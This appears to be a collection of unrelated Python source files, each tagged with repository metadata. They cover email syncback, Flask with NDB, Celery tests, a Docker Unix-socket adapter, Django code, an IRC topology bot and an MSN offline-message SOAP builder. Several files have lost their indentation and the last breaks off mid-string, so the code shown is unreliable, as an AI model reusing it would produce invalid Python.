# TODO(emfree): once we can do retry, persist a pointer into the
# transaction log and advance it only on syncback success.
self.minimum_id, = db_session.query(
func.max(ActionLog.id)).one()
if self.minimum_id is None:
self.minimum_id = -1
gevent.Greenlet.__init__(self)
def _process_log(self):
# TODO(emfree) handle the case that message/thread objects may have
# been deleted in the interim
with session_scope() as db_session:
query = db_session.query(ActionLog). \
filter(ActionLog.id > self.minimum_id). \
order_by(asc(ActionLog.id)).yield_per(self.chunk_size)
for log_entry in query:
self.minimum_id = log_entry.id
action_function = ACTION_FUNCTION_MAP[log_entry.action]
namespace = db_session.query(Namespace). \
get(log_entry.namespace_id)
self._execute_async_action(action_function,
namespace.account_id,
log_entry.record_id)
def _execute_async_action(self, func, *args):
self.log.info('Scheduling syncback action', func=func, args=args)
g = gevent.Greenlet(retry_with_logging, lambda: func(*args),
logger=self.log)
g.link_value(lambda _: self.log.info('Syncback action completed',
func=func, args=args))
self.worker_pool.start(g)
def _run_impl(self):
self.log.info('Starting action service')
while True:
self._process_log()
gevent.sleep(self.poll_interval)
def _run(self):
retry_with_logging(self._run_impl, self.log)
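# Self-contained sketch of the dispatch-table pattern _process_log() relies on:
# resolve the handler by the action name stored on the log entry. Everything
# below is an illustrative stand-in, not part of the inbox codebase.
def _demo_archive(account_id, record_id):
    return ('archived', account_id, record_id)

_DEMO_ACTIONS = {'archive': _demo_archive}
_demo_entry = {'action': 'archive', 'record_id': 42}
assert _DEMO_ACTIONS[_demo_entry['action']](7, _demo_entry['record_id']) == ('archived', 7, 42)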
|
GoogleCloudPlatform/python-docs-samples
|
datastore/cloud-ndb/flask_app.py
|
Python
|
apache-2.0
| 1,175
| 0
|
# Copyright 2019 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START ndb_flask]
from flask import Flask
from google.cloud import ndb
client = ndb.Client()
def ndb_wsgi_middleware(wsgi_app):
def middleware(environ, start_response):
with client.context():
return wsgi_app(environ, start_response)
return middleware
app = Flask(__name__)
app.wsgi_app = ndb_wsgi_middleware(app.wsgi_app) # Wrap the app in middleware.
class Book(ndb.Model):
title = ndb.StringProperty()
@app.route('/')
def list_books():
books = Book.query()
return str([book.to_dict() for book in books])
# [END ndb_flask]
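# Sketch of the same wrap-every-request pattern with a generic context manager,
# independent of ndb (the names below are illustrative, not a Google API):
from contextlib import contextmanager

@contextmanager
def _demo_context():
    yield  # acquire/release a per-request resource here

def _demo_middleware(wsgi_app):
    def middleware(environ, start_response):
        with _demo_context():
            return wsgi_app(environ, start_response)
    return middleware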
|
Sunhick/design-patterns
|
Behavioral/Command/Command.py
|
Python
|
gpl-3.0
| 230
| 0.008696
|
"""
Command.py
"""
from abc import ABCMeta, abstractmethod
class Command(object):
__metaclass__ = ABCMeta
@abstractmethod
def execute(self):
pass
@abstractmethod
def unexecute(self):
pass
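# Hypothetical concrete command (not in the original sample), showing how
# execute()/unexecute() form an undoable pair:
class AppendCommand(Command):
    def __init__(self, target, value):
        self.target, self.value = target, value

    def execute(self):
        self.target.append(self.value)

    def unexecute(self):
        self.target.remove(self.value)

_history = []
_cmd = AppendCommand(_history, 'x')
_cmd.execute()    # _history == ['x']
_cmd.unexecute()  # _history == []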
|
kawamon/hue
|
desktop/core/ext-py/celery-4.2.1/t/unit/worker/test_heartbeat.py
|
Python
|
apache-2.0
| 1,829
| 0
|
from __future__ import absolute_import, unicode_literals
from case import Mock
from celery.worker.heartbeat import Heart
class MockDispatcher(object):
heart = None
next_iter = 0
def __init__(self):
self.sent = []
self.on_enabled = set()
self.on_disabled = set()
self.enabled = True
def send(self, msg, **_fields):
self.sent.append(msg)
if self.heart:
if self.next_iter > 10:
self.heart._shutdown.set()
self.next_iter += 1
class MockTimer(object):
def call_repeatedly(self, secs, fun, args=(), kwargs={}):
class entry(tuple):
canceled = False
def cancel(self):
self.canceled = True
return entry((secs, fun, args, kwargs))
def cancel(self, entry):
entry.cancel()
class test_Heart:
def test_start_stop(self):
timer = MockTimer()
eventer = MockDispatcher()
h = Heart(timer, eventer, interval=1)
h.start()
assert h.tref
h.stop()
assert h.tref is None
h.stop()
def test_send_sends_signal(self):
h = Heart(MockTimer(), MockDispatcher(), interval=1)
h._send_sent_signal = None
h._send('worker-heartbeat')
h._send_sent_signal = Mock(name='send_sent_signal')
h._send('worker')
h._send_sent_signal.assert_called_with(sender=h)
def test_start_when_disabled(self):
timer = MockTimer()
eventer = MockDispatcher()
eventer.enabled = False
h = Heart(timer, eventer)
h.start()
assert not h.tref
def test_stop_when_disabled(self):
timer = MockTimer()
eventer = MockDispatcher()
eventer.enabled = False
h = Heart(timer, eventer)
h.stop()
|
whyDK37/py_bootstrap
|
samples/commonlib/use_sax.py
|
Python
|
apache-2.0
| 739
| 0
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from xml.parsers.expat import ParserCreate
class DefaultSaxHandler(object):
def start_element(self, name, attrs):
print('sax:start_element: %s, attrs: %s' % (name, str(attrs)))
def end_element(self, name):
print('sax:end_element: %s' % name)
def char_data(self, text):
print('sax:char_data: %s' % text)
xml = r'''<?xml version="1.0"?>
<ol>
<li><a href="/python">Python</a></li>
<li><a href="/ruby">Ruby</a></li>
</ol>
'''
handler = DefaultSaxHandler()
parser = ParserCreate()
parser.StartElementHandler = handler.start_element
parser.EndElementHandler = handler.end_element
parser.CharacterDataHandler = handler.char_data
parser.Parse(xml)
|
shakamunyi/docker-py
|
docker/unixconn/unixconn.py
|
Python
|
apache-2.0
| 3,189
| 0
|
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import requests.adapters
import socket
if six.PY3:
import http.client as httplib
else:
import httplib
try:
import requests.packages.urllib3 as urllib3
except ImportError:
import urllib3
RecentlyUsedContainer = urllib3._collections.RecentlyUsedContainer
class UnixHTTPConnection(httplib.HTTPConnection, object):
def __init__(self, base_url, unix_socket, timeout=60):
super(UnixHTTPConnection, self).__init__(
'localhost', timeout=timeout
)
self.base_url = base_url
self.unix_socket = unix_socket
self.timeout = timeout
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect(self.unix_socket)
self.sock = sock
class UnixHTTPConnectionPool(urllib3.connectionpool.HTTPConnectionPool):
def __init__(self, base_url, socket_path, timeout=60):
super(UnixHTTPConnectionPool, self).__init__(
'localhost', timeout=timeout
)
self.base_url = base_url
self.socket_path = socket_path
self.timeout = timeout
def _new_conn(self):
return UnixHTTPConnection(self.base_url, self.socket_path,
self.timeout)
class UnixAdapter(requests.adapters.HTTPAdapter):
def __init__(self, socket_url, timeout=60):
socket_path = socket_url.replace('http+unix://', '')
if not socket_path.startswith('/'):
socket_path = '/' + socket_path
self.socket_path = socket_path
self.timeout = timeout
self.pools = RecentlyUsedContainer(10,
dispose_func=lambda p: p.close())
super(UnixAdapter, self).__init__()
def get_connection(self, url, proxies=None):
with self.pools.lock:
pool = self.pools.get(url)
if pool:
return pool
pool = UnixHTTPConnectionPool(
url, self.socket_path, self.timeout
)
self.pools[url] = pool
return pool
def request_url(self, request, proxies):
# The select_proxy utility in requests errors out when the provided URL
# doesn't have a hostname, like is the case when using a UNIX socket.
# Since proxies are an irrelevant notion in the case of UNIX sockets
# anyway, we simply return the path URL directly.
# See also: https://github.com/docker/docker-py/issues/811
return request.path_url
def close(self):
self.pools.clear()
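# Hedged usage sketch: mount the adapter on a requests session so http+unix://
# URLs go over the socket. The socket path below is hypothetical, and the final
# GET is commented out because it needs a listening daemon to answer.
_demo_session = requests.Session()
_demo_session.mount('http+unix://', UnixAdapter('http+unix:///var/run/docker.sock'))
# _demo_session.get('http+unix://localhost/_ping')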
|
CitrineInformatics/pypif
|
pypif/obj/common/instrument.py
|
Python
|
apache-2.0
| 2,048
| 0.000977
|
from six import string_types
from pypif.obj.common.pio import Pio
class Instrument(Pio):
"""
Information about an instrument used to take a measurement.
"""
def __init__(self, name=None, model=None, producer=None, url=None, tags=None, **kwargs):
"""
Constructor.
:param name: String with the name of the instrument.
:param model: String with the model of the instrument.
:param producer: String with the name of the producer of the instrument.
:param url: URL to the instrument website.
:param tags: List of strings or numbers that are tags for this object.
:param kwargs: Dictionary of fields that are not supported.
"""
super(Instrument, self).__init__(tags=tags, **kwargs)
self._name = None
self.name = name
self._model = None
self.model = model
self._producer = None
self.producer = producer
self._url = None
self.url = url
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._validate_type('name', name, string_types)
self._name = name
@name.deleter
def name(self):
self._name = None
@property
def model(self):
return self._model
@model.setter
def model(self, model):
self._validate_type('model', model, string_types)
self._model = model
@model.deleter
def model(self):
self._model = None
@property
def producer(self):
return self._producer
@producer.setter
def producer(self, producer):
self._validate_type('producer', producer, string_types)
self._producer = producer
@producer.deleter
def producer(self):
self._producer = None
@property
def url(self):
return self._url
@url.setter
def url(self, url):
self._validate_type('url', url, string_types)
self._url = url
@url.deleter
def url(self):
self._url = None
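# Usage sketch (values illustrative, assuming the pypif package imports cleanly):
# setters validate types, deleters reset the backing field to None.
#   _demo = Instrument(name='XRD-6000', producer='Shimadzu')
#   _demo.model = 'ABC-123'   # passes _validate_type('model', ..., string_types)
#   del _demo.model           # _model is None again
#   _demo.name = 123          # would raise: 123 is not a string type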
|
stvstnfrd/edx-platform
|
openedx/core/djangoapps/programs/migrations/0013_customprogramsconfig.py
|
Python
|
agpl-3.0
| 1,294
| 0.003864
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.26 on 2019-12-13 07:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('programs', '0012_auto_20170419_0018'),
]
operations = [
migrations.CreateModel(
name='CustomProgramsConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('change_date', models.DateTimeField(auto_now_add=True, verbose_name='Change date')),
('enabled', models.BooleanField(default=False, verbose_name='Enabled')),
('arguments', models.TextField(blank=True, default='', help_text='Useful for manually running a Jenkins job. Specify like "--usernames A B --program-uuids X Y".')),
('changed_by', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, verbose_name='Changed by')),
],
options={
'verbose_name': 'backpopulate_program_credentials argument',
},
),
]
|
USGSDenverPychron/pychron
|
docs/user_guide/operation/scripts/examples/argus/measurement/jan_unknown_air_for_38Ar_600_180.py
|
Python
|
apache-2.0
| 2,496
| 0.014824
|
#!Measurement
'''
baseline:
after: true
before: false
counts: 180
detector: H1
mass: 34.2
settling_time: 20.0
default_fits: nominal
equilibration:
eqtime: 1.0
inlet: R
inlet_delay: 3
outlet: O
use_extraction_eqtime: true
post_equilibration_delay: 5
multicollect:
counts: 600
detector: H1
isotope: Ar40
peakcenter:
after: true
before: false
detector: H1
detectors:
- H1
- AX
- L2
- CDD
integration_time: 0.262144
isotope: Ar40
peakhop:
generate_ic_table: false
hops_name: ''
ncycles: 0
use_peak_hop: false
'''
ACTIVE_DETECTORS=('H2','H1','AX','L1','L2','CDD')
def main():
info('unknown measurement script')
set_deflection('CDD', 400)
activate_detectors(*ACTIVE_DETECTORS)
if mx.peakcenter.before:
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope)
if mx.baseline.before:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
position_magnet(mx.multicollect.isotope, detector=mx.multicollect.detector)
#sniff the gas during equilibration
if mx.equilibration.use_extraction_eqtime:
eqt = eqtime
else:
eqt = mx.equilibration.eqtime
'''
Equilibrate is non-blocking so use a sniff or sleep as a placeholder
e.g. sniff(<equilibration_time>) or sleep(<equilibration_time>)
'''
equilibrate(eqtime=eqt, inlet=mx.equilibration.inlet, outlet=mx.equilibration.outlet,
delay=mx.equilibration.inlet_delay)
set_time_zero()
sniff(eqt)
set_fits()
set_baseline_fits()
# delay to mitigate 39Ar spike from inlet valve close
sleep(mx.equilibration.post_equilibration_delay)
#multicollect on active detectors
multicollect(ncounts=mx.multicollect.counts, integration_time=1)
if mx.baseline.after:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
if mx.peakcenter.after:
activate_detectors(*mx.peakcenter.detectors, **{'peak_center':True})
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope,
integration_time=mx.peakcenter.integration_time)
if use_cdd_warming:
gosub('warm_cdd', argv=(mx.equilibration.outlet,))
set_deflection('CDD', 50)
info('finished measure script')
|
cosminbasca/rdftools
|
rdftools/tools/jvmrdftools/__init__.py
|
Python
|
apache-2.0
| 3,224
| 0.001861
|
#
# author: Cosmin Basca
#
# Copyright 2010 University of Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import signal
from subprocess import Popen, PIPE, STDOUT, call
from threading import Thread
from natsort import natsorted
__author__ = 'basca'
__LIB_NAME__ = 'jvmrdftools-assembly-'
__LIB__ = os.path.join(os.path.dirname(os.path.realpath(__file__)), "lib")
__JARS__ = natsorted([(jar.replace(__LIB_NAME__, "").replace(".jar", ""),
os.path.join(__LIB__, jar))
for jar in os.listdir(__LIB__) if jar.startswith(__LIB_NAME__)],
key=lambda (ver, jar_file): ver)
def latest_jar():
global __JARS__
return __JARS__[-1]
class JavaNotFoundException(Exception):
pass
DEVNULL = open(os.devnull, 'w')
XMS = 128
XMX = 2048
def check_java(message=""):
if call(['java', '-version'], stderr=DEVNULL) != 0:
raise JavaNotFoundException(
'Java is not installed in the system path. {0}'.format(message))
def run_tool(main_class, xms=XMS, xmx=XMX, *options):
latest_version, jar_path = latest_jar()
command = ["java", "-Xms{0}m".format(xms), "-Xmx{0}m".format(xmx), "-classpath", jar_path, main_class] + \
[str(opt) for opt in options]
# call(command, stdout=PIPE, stdin=PIPE, stderr=STDOUT, preexec_fn=os.setsid)
call(command)
# ----------------------------------------------------------------------------------------------------------------------
#
# the specific tools
#
# ----------------------------------------------------------------------------------------------------------------------
def run_lubm_generator(num_universities, index, generator_seed, ontology, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.LubmGenerator",
xms, xmx,
"--num_universities", num_universities,
"--start_index", index,
"--seed", generator_seed,
"--ontology", ontology,
"--output_path", output_path)
def run_nxvoid_generator(source, dataset_id, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.NxVoidGenerator",
xms, xmx,
"--source", source,
"--dataset_id", dataset_id,
"--output_path", output_path)
def run_jvmvoid_generator(source, dataset_id, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.VoIDGenerator",
xms, xmx,
"--source", source,
"--dataset_id", dataset_id,
"--output_path", output_path)
def run_rdf2rdf_converter(source, destination, xms=XMS, xmx=XMX):
run_tool("com.rdftoo
|
ls.Rdf2RdfConverter",
xms, xmx,
source, destination)
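# Illustrative only: the argv list run_tool() assembles for the converter with
# default heap sizes (jar version and file names below are hypothetical):
#   ['java', '-Xms128m', '-Xmx2048m', '-classpath',
#    '.../lib/jvmrdftools-assembly-1.2.jar',
#    'com.rdftools.Rdf2RdfConverter', 'input.nt', 'output.ttl']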
|
RedMadRobot/rmr_django
|
rmr/middleware/json.py
|
Python
|
mit
| 1,109
| 0
|
import json
from django import http
from django.conf import settings
from rmr.types import JsonDict
class RequestDecoder:
content_type = 'application/json'
allowed_methods = {
'POST', 'PUT', 'PATCH',
}
def process_request(self, request):
if request.method not in self.allowed_methods:
return
content_type = request.META.get('CONTENT_TYPE', '')
if not content_type.startswith(self.content_type):
return
encoding = request.encoding or settings.DEFAULT_CHARSET
try:
body = request.body.decode(encoding=encoding)
except UnicodeDecodeError:
return http.HttpResponseBadRequest('bad unicode')
try:
request.POST = self.json_decode(body)
except ValueError:
return http.HttpResponseBadRequest('malformed data')
@staticmethod
def json_decode(body):
data = json.loads(body)
if not isinstance(data, dict):
# all data of types other than dict will be returned as is
return data
return JsonDict(data)
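# Quick sketch of json_decode() semantics (payloads illustrative, assuming the
# rmr package imports): dict bodies are wrapped in JsonDict, any other JSON
# value is returned as is.
assert isinstance(RequestDecoder.json_decode('{"a": 1}'), JsonDict)
assert RequestDecoder.json_decode('[1, 2, 3]') == [1, 2, 3]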
|
synthomat/irc_topology_drawer
|
irc_topology_drawer.py
|
Python
|
apache-2.0
| 2,147
| 0.01211
|
#!/usr/bin/python
"""
Copyright 2012
Anton Zering <synth@lostprofile.de>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
try:
import yapgvb
import irclib
except:
print "Some dependencies could not been fulfilled. Exiting."
sys.exit(0)
SERVER = ("efnet.portlane.se", 6667)
NICK = "topologybot"
OUTPUT_FILE = "%s_topology.png" % SERVER[0]
def generate_links(links):
""" create a clique of n nodes """
# Create a new undirected graph
graph = yapgvb.Graph('%s-clique' % 10)
nodes = {}
for link in links:
nodes[link[0]] = graph.add_node(label= link[0])
for link in links:
if link[0] == link[1]:
continue
nodes[link[0]] >> nodes[link[1]]
graph.layout(yapgvb.engines.dot)
format = yapgvb.formats.png
filename = OUTPUT_FILE
graph.render(filename)
class IRCCat(irclib.SimpleIRCClient):
def __init__(self):
irclib.SimpleIRCClient.__init__(self)
self.links = []
def on_welcome(self, connection, event):
print "connected, fetching links"
connection.links()
def on_links(self, connection, event):
print event.arguments()
self.links.append(event.arguments())
def on_endoflinks(self, connection, event):
print "rendering"
generate_links(self.links)
connection.disconnect()
def on_disconnect(self, connection, event):
sys.exit(0)
def main():
c = IRCCat()
try:
print "connecting"
c.connect(SERVER[0], SERVER[1], NICK)
except irclib.ServerConnectionError, x:
print x
sys.exit(1)
c.start()
if __name__ == "__main__":
main()
|
kbsymanz/gnuhealth_mmc
|
mmc.py
|
Python
|
mit
| 35,273
| 0.003714
|
# -------------------------------------------------------------------------------
# mmc.py
#
# Customization of GnuHealth for the needs of Mercy Maternity Clinic, Inc.
# -------------------------------------------------------------------------------
from trytond.model import ModelView, ModelSingleton, ModelSQL, fields
from trytond.pyson import Eval, Not, Bool, Or, And
from trytond.pool import Pool
import datetime
import logging
__all__ = [
'MmcReports',
'MmcSequences',
'MmcPatientData',
'MmcPatientDiseaseInfo',
'MmcVaccination',
'MmcPatientMedication',
'MmcMedicationTemplate',
'MmcPatientPregnancy',
'MmcPrenatalEvaluation',
'MmcPerinatal',
'MmcPerinatalMonitor',
'MmcPuerperiumMonitor',
'Address',
'MmcPostpartumContinuedMonitor',
'MmcPostpartumOngoingMonitor',
]
mmcLog = logging.getLogger('mmc')
def month_num_to_abbrev(num):
mon = {}
mon['01'] = 'Jan'
mon['02'] = 'Feb'
mon['03'] = 'Mar'
mon['04'] = 'Apr'
mon['05'] = 'May'
mon['06'] = 'Jun'
mon['07'] = 'Jul'
mon['08'] = 'Aug'
mon['09'] = 'Sep'
mon['10'] = 'Oct'
mon['11'] = 'Nov'
mon['12'] = 'Dec'
return mon[num]
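# Aside: the standard library offers an equivalent one-liner, noted here only
# as a sketch (the behavior above is unchanged):
#   import calendar; calendar.month_abbr[int(num)]  # 'Jan' for num == '01'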
class MmcReports(ModelSingleton, ModelSQL, ModelView):
'Class for custom reports'
__name__ = 'mmc.reports'
class MmcSequences(ModelSingleton, ModelSQL, ModelView):
"Sequences for MMC"
__name__ = "mmc.sequences"
doh_sequence = fields.Property(fields.Many2One('ir.sequence',
'DOH Sequence', domain=[('code', '=', 'mmc.doh')],
required=True))
class MmcPatientData(ModelSQL, ModelView):
'Patient related information'
__name__ = 'gnuhealth.patient'
# --------------------------------------------------------
# Hide these fields
# --------------------------------------------------------
family = fields.Many2One('gnuhealth.family', 'x',
states={'invisible': True})
primary_care_doctor = fields.Many2One('gnuhealth.physician', 'x',
states={'invisible': True})
current_insurance = fields.Many2One('gnuhealth.insurance', 'x',
states={'invisible': True})
# --------------------------------------------------------
# Expand the selection list of these fields.
# --------------------------------------------------------
marital_status = fields.Function(
fields.Selection([
(None, ''),
('l', 'Live-in'),
('s', 'Single'),
('m', 'Married'),
('c', 'Concubinage'),
('w', 'Widowed'),
('d', 'Divorced'),
('x', 'Separated'),
], 'Marital Status', sort=False), 'get_patient_marital_status')
rh = fields.Selection([
('u', 'Unknown'),
('+', '+'),
('-', '-'),
], 'Rh')
# --------------------------------------------------------
# Change the label on these fields.
# --------------------------------------------------------
diseases = fields.One2Many('gnuhealth.patient.disease', 'name', 'Condition')
gravida = fields.Integer ('G', required=True)
abortions = fields.Integer('A')
stillbirths = fields.Integer('S')
# --------------------------------------------------------
# Add Pregnancy fields.
# --------------------------------------------------------
living = fields.Integer('L') # number of live births
para = fields.Integer('P') # number of times given birth
term = fields.Integer('Term') # number of pregnancies to full term
preterm = fields.Integer('Preterm') # number of pregnancies not to full term
# --------------------------------------------------------
# Add Phil Health related fields.
# --------------------------------------------------------
phil_health = fields.Boolean('Phil Health',
help='Mark if the patient has Phil Health')
phil_health_mcp = fields.Boolean('MCP',
help="If MCP applies",
states={'invisible': Not(Bool(Eval('phil_health')))},
depends=['phil_health'])
phil_health_ncp = fields.Boolean('NCP',
help="If NCP applies",
states={'invisible': Not(Bool(Eval('phil_health')))},
depends=['phil_health'])
phil_health_id = fields.Char('PHIC#',
size=14,
help="The patients Phil Health ID number",
states={
'invisible': Not(Bool(Eval('phil_health'))),
'required': Bool(Eval('phil_health'))
},
on_change=['phil_health_id'],
depends=['phil_health'])
# --------------------------------------------------------
# Add new screening related fields.
# --------------------------------------------------------
gram_stain = fields.Boolean('Gram Stain',
help="Check if gram stain was done")
breast_self_exam_taught = fields.Boolean('Taught breast self exam',
help="Check if patient has been taught how to do breast self exams")
# --------------------------------------------------------
# Department of Health required id (aka MMC ID#).
# --------------------------------------------------------
doh_id = fields.Char('MMC ID',
size=8,
help="Dept of Health id", required=False,
select=True, on_change=['doh_id'])
# --------------------------------------------------------
# Format DOH ID # in the customary fashion after the user
# types it in. User can type with hyphens or not. But don't
# change anything unless the field seems correct.
# --------------------------------------------------------
def on_change_doh_id(self):
origFld = self.doh_id
doh = origFld.replace('-', '')
val = origFld
if ((len(doh) == 6) and (doh.isdigit())):
val = "{0}-{1}-{2}".format(doh[:2], doh[2:4], doh[4:6])
return {'doh_id': val}
# --------------------------------------------------------
# Format PHIC# in the customary fashion after the user
# types it in. User can type with hyphens or not. But don't
# change anything unless the field seems correct.
# --------------------------------------------------------
def on_change_phil_health_id(self):
origFld = self.phil_health_id
phic = origFld.replace('-', '')
val = origFld
if ((len(phic) == 12) and (phic.isdigit())):
val = "{0}-{1}-{2}".format(phic[:2], phic[2:11], phic[-1])
return {'phil_health_id': val}
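# Self-contained sketch of the reformatting rule shared by both on_change
# handlers above: strip hyphens, then re-hyphenate only when the remainder
# is all digits of the expected length (sample values are made up):
#   '121234567891'   -> '12-123456789-1'  (12-digit PHIC)
#   '12-123456789-1' -> '12-123456789-1'  (idempotent)
#   'abc'            -> 'abc'             (left untouched)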
# --------------------------------------------------------
# Validate the DOH ID.
# --------------------------------------------------------
@staticmethod
def validate_doh_id(ids):
for patientData in ids:
if (patientData.doh_id == None or len(patientData.doh_id) == 0):
return True
doh = patientData.doh_id.replace('-', '')
if (len(doh) != 6):
return False
if (not doh.isdigit()):
return False
return True
# --------------------------------------------------------
# Validate the PHIC #.
# --------------------------------------------------------
@staticmethod
def validate_phil_health_id(ids):
for patientData in ids:
if not patientData.phil_health:
# if Phil Health does not apply, then we are fine.
return True
phic = patientData.phil_health_id.replace('-', '')
if (len(phic) != 12):
mmcLog.info('Phil Health id is not the correct length')
return False
if (not phic.isdigit()):
mmcLog.info('Phil Health id is not a number')
return False
return True
# --------------------------------------------------------
# Set a reasonable default sex for a maternity clinic.
# --------------------------------------------------------
@staticmethod
def default_sex():
return 'f'
# --------------------------------------------------------
# 99.4% of all people in the Philippines are Rh positive.
# Oftentimes blood tests do not
|
|
jejimenez/django
|
tests/handlers/tests_custom_error_handlers.py
|
Python
|
bsd-3-clause
| 888
| 0
|
from django.conf.urls import url
from django.core.exceptions import PermissionDenied
from django.template.response import TemplateResponse
from django.test import SimpleTestCase, override_settings
def template_response_error_handler(request, exception=None):
return TemplateResponse(request, 'test_handler.html', status=403)
def permission_denied_view(request):
raise PermissionDenied
urlpatterns = [
url(r'^$', permission_denied_view),
]
handler403 = template_response_error_handler
@override_settings(ROOT_URLCONF='handlers.tests_custom_error_handlers')
class CustomErrorHandlerTests(SimpleTestCase):
def test_handler_renders_template_response(self):
"""
BaseHandler should render TemplateResponse if necessary.
"""
response = self.client.get('/')
self.assertContains(response, 'Error handler content', status_code=403)
|
andrebellafronte/stoq
|
stoqlib/gui/base/slaves.py
|
Python
|
gpl-2.0
| 1,749
| 0.007433
|
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2005, 2006 Async Open Source
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
""" Basic slave definitions """
from stoqlib.lib.translation import stoqlib_gettext
from stoqlib.gui.editors.baseeditor import BaseEditorSlave
_ = stoqlib_gettext
# FIXME: s/NoteSlave/NotesSlave/ and move this to stoqlib.gui.slaves.notesslave
class NoteSlave(BaseEditorSlave):
""" Slave store general notes. The model must have an attribute 'notes'
to work.
"""
gladefile = 'NoteSlave'
proxy_widgets = ('notes', )
def __init__(self, store, model, visual_mode=False):
self.model = model
self.model_type = self.model_type or type(model)
BaseEditorSlave.__init__(self, store, self.model,
visual_mode=visual_mode)
self.notes.set_accepts_tab(False)
def setup_proxies(self):
self.proxy = self.add_proxy(self.model,
NoteSlave.proxy_widgets)
|
emesene/papyon
|
papyon/service/description/OIM/Store2.py
|
Python
|
gpl-2.0
| 3,213
| 0.009648
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Johann Prieur <johann.prieur@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
import xml.sax.saxutils as xml
def soap_header(from_member_name, friendly_name, proxy, msnp_ver, build_ver,
to_member_name, message_number, security_token, app_id,
lock_key):
"""Return
|
s the SOAP
|
xml header"""
# FIXME : escape the parameters
return """<From memberName="%(from_member_name)s" friendlyName="%(friendly_name)s" xml:lang="en-US" proxy="%(proxy)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/" msnpVer="%(msnp_ver)s" buildVer="%(build_ver)s"/>
<To memberName="%(to_member_name)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/"/>
<Ticket passport="%(passport)s" appid="%(app_id)s" lockkey="%(lock_key)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/"/>
<Sequence xmlns="http://schemas.xmlsoap.org/ws/2003/03/rm">
<Identifier xmlns="http://schemas.xmlsoap.org/ws/2002/07/utility">
http://messenger.msn.com
</Identifier>
<MessageNumber>%(message_number)s</MessageNumber>
</Sequence>""" % { 'from_member_name' : from_member_name,
'friendly_name' : friendly_name,
'proxy' : proxy,
'msnp_ver' : msnp_ver,
'build_ver' : build_ver,
'to_member_name' : to_member_name,
'passport' : xml.escape(security_token),
'app_id' : app_id,
'lock_key' : lock_key,
'message_number' : message_number }
def transport_headers():
"""Returns a dictionary, containing transport (http) headers
to use for the request"""
return {}
def soap_action():
"""Returns the SOAPAction value to pass to the transport
or None if no SOAPAction needs to be specified"""
return "http://messenger.live.com/ws/2006/09/oim/Store2"
def soap_body(message_type, message_content):
"""Returns the SOAP xml body"""
return """<MessageType xmlns="http://messenger.msn.com/ws/2004/09/oim/">
%s
</MessageType>
